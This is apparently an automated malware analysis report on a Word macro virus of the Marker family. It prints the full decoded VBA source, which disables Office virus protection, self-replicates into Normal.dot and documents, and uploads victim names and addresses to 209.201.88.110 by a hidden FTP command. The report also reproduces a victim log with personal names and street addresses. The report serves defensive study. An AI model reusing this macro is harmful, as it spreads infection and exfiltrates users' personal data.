Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e5b7802b00e90c9b…

MALICIOUS

Office (OLE)

112.0 KB Created: 2007-08-17 21:26:00 Authoring application: Microsoft Word 11.3 First seen: 2015-04-05
MD5: 1a652df83e6d1b8e3a4fdf90037d29d5 SHA-1: a0de3886f57a8df6b462a7b71f6d4f77bfb5851d SHA-256: e5b7802b00e90c9bc9f783fb6031adb1d078d2951f4aa3161b8956590ce6a062
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The VBA macro within this document is designed to disable macro security and replicate itself to the Normal.dot template, indicating a self-propagation and persistence mechanism. It also attempts to write a file to 'c:\hsf????.sys' and a script to 'c:\netldx.vxd' which contains FTP commands to upload the first file to '209.201.88.110'. This suggests the document acts as a dropper for a secondary payload.

Heuristics 4

  • ClamAV: Doc.Trojan.Marker-31 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-31
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    'Switch the VirusProtection OFF
Options.VirusProtection = False

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7303 bytes
SHA-256: 1f980839b9e982a32483f0a461425d730dd71cb926f161eb47fd1067a6ab7551
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

On Error Resume Next

Const Marker = "<- this is a marker!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)


'Switch the VirusProtection OFF
Options.VirusProtection = False


  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
  
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    
  End If


'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
   
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)

    
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)


    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
  End If


  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)

    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    
End If

End Sub

' Logfile -->

' 09:08:36  - Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet
'



' 02:50:31 PM - Saturday, 28 Nov 1998
' MARK B. SEAY
'



' 08:04:45 AM - Friday, 4 Dec 1998
' UPS
'



' 11:43:35 AM - Thursday, 17 Dec 1998
' WRO
'



' 03:07:26 PM - Tuesday, 22 Dec 1998
' BCBSA
'



' 02:53:45 PM - Tuesday, 5 Jan 1999
' BCBSA
'



' 02:43:30 PM - Friday, 8 Jan 1999
' Michele Steele
'



' 06:51:05 AM - Tuesday, 12 Jan 1999
' iac883
'



' 10:42:53 AM - Thursday, 14 Jan 1999
' ia7039
'



' 11:17:30 AM - Thursday, 14 Jan 1999
' Susan K Osmann
'



' 08:39:20 AM - Friday, 15 Jan 1999
' iab086
'



' 10:13:51 AM - Monday, 18 Jan 1999
' iac112
'



' 04:38:15 PM - Monday, 18 Jan 1999
' ia5401
'



' 05:51:09 PM - Thursday, 21 Jan 1999
' iaa645
'



' 01:40:06 PM - Monday, 25 Jan 1999
' ia6989
'



' 03:31:53 PM - Wednesday, 27 Jan 1999
' iaa186
'



' 02:57:15 PM - Friday, 29 Jan 1999
' IAB045
'



' 11:45:36 AM - Friday, 12 Feb 1999
' Jay Urbain
'



' 03:46:56 PM - Wednesday, 17 Feb 1999
' Sandy Dickinson
'



' 06:41:30 PM - Tuesday, 23 Feb 1999
' Rena' Dragseth
' Dragseth and Associates
' 3501 Xenium Lane North
' Suite 177
' Plymouth, MN  55441



' 03:02:21 PM - Wednesday, 3 Mar 1999
' Marc Patefield
'



' 07:05:27 PM - Sunday, 21 Mar 1999
' Information Technologies
'



' 01:54:40 AM - Monday, 22 Mar 1999
' markeith boney
'



' 06:07:49 PM - Tuesday, 23 Mar 1999
' Information Technologies
'



' 04:59:15 PM - Wednesday, 24 Mar 1999
' Information Technologies
'



' 09:30:52 PM - Wednesday, 24 Mar 1999
' Information Technologies
'



' 12:49:15 PM - Monday, 5 Apr 1999
' Information Technologies
' Amy Madison
' Northwestern College
' 3003 Snelling Avenue North
' Saint Paul, MN  55113



' 08:24:17 AM - Wednesday, 7 Apr 1999
' Information Technologies
' Sally Hawkins
' 5610 Matterhorn Dr. NE
' Fridley, MN 55432



' 12:39:45 PM - Wednesday, 14 Apr 1999
' Information Technologies
'



' 01:40:44 AM - Thursday, 15 Apr 1999
' Information Technologies
'



' 04:29:42 PM - Thursday, 15 Apr 1999
' Information Technologies
'



' 10:00:29 AM - Friday, 16 Apr 1999
' Information Technologies
' Josh Olson
' 3003 Snelling Ave. N.
' St. Paul, MN
' 55113



' 08:17:39 PM - Sunday, 25 Apr 1999
' CrossRoads Church
'



' 07:19:46 AM - Thursday, 17 Jun 1999
' Highland Hope Church
'



' 10:28:51 AM - Wednesday, 25 Aug 1999
' Highland Hope
'



' 03:36:32 PM - Thursday, 11 Nov 1999
' Dan Perry
'



' 02:19:43 PM - Wednesday, 24 Nov 1999
' Highland Middle School
'



' 07:21:50 AM - Monday, 31 Jan 2000
' HCUSD #5
'



' 01:54:47 AM - Wednesday, 24 May 2000
' Jeff Wright
'



' 02:24:43 AM - Thursday, 14 Jan 1904
' HHS
'



' 03:02:01 PM - Wednesday, 8 May 2002
' HHS
'



' 08:32:52 AM - Tuesday, 14 May 2002
' HHS
'



' 11:03:00 AM - Tuesday, 4 Feb 2003
' HSD
'



' 09:37:33 AM - Monday, 10 Mar 2003
' HSD
'



' 01:37:40 PM - Tuesday, 1 Apr 2003
' HSD
'



' 12:35:41 PM - Friday, 11 Apr 2003
' HSD
'



' 10:46:53 AM - Thursday, 15 May 2003
' HSD
'



' 12:18:42 PM - Tuesday, 27 May 2003
' HSD
'



' 12:07:40 AM - Saturday, 2 Jan 1904
' HSD
'



' 07:37:17 AM - Friday, 23 Apr 2004
' HSD
'


' 01:26:15 PM - Monday, 27 Sep 2004
' HSD
'



' 09:40:29 AM - Thursday, 17 Mar 2005
' HSD
'


' 01:34:00 PM - Friday, 10 Feb 2006
' HSD HSD
' HSD
'



' 07:36:12 AM - Monday, 28 Aug 2006
' Highland
' HSD
'


' 01:03:24 PM - Tuesday, 5 Sep 2006
' HSD HSD
' Highland CUSD #5
'



' 03:11:32 PM - Wednesday, 21 Nov 2007
' HSD
'



' 03:18:14 PM - Wednesday, 9 Jan 2008
' HSD
'

Open this report in the interactive analyzer, or submit your own file for analysis.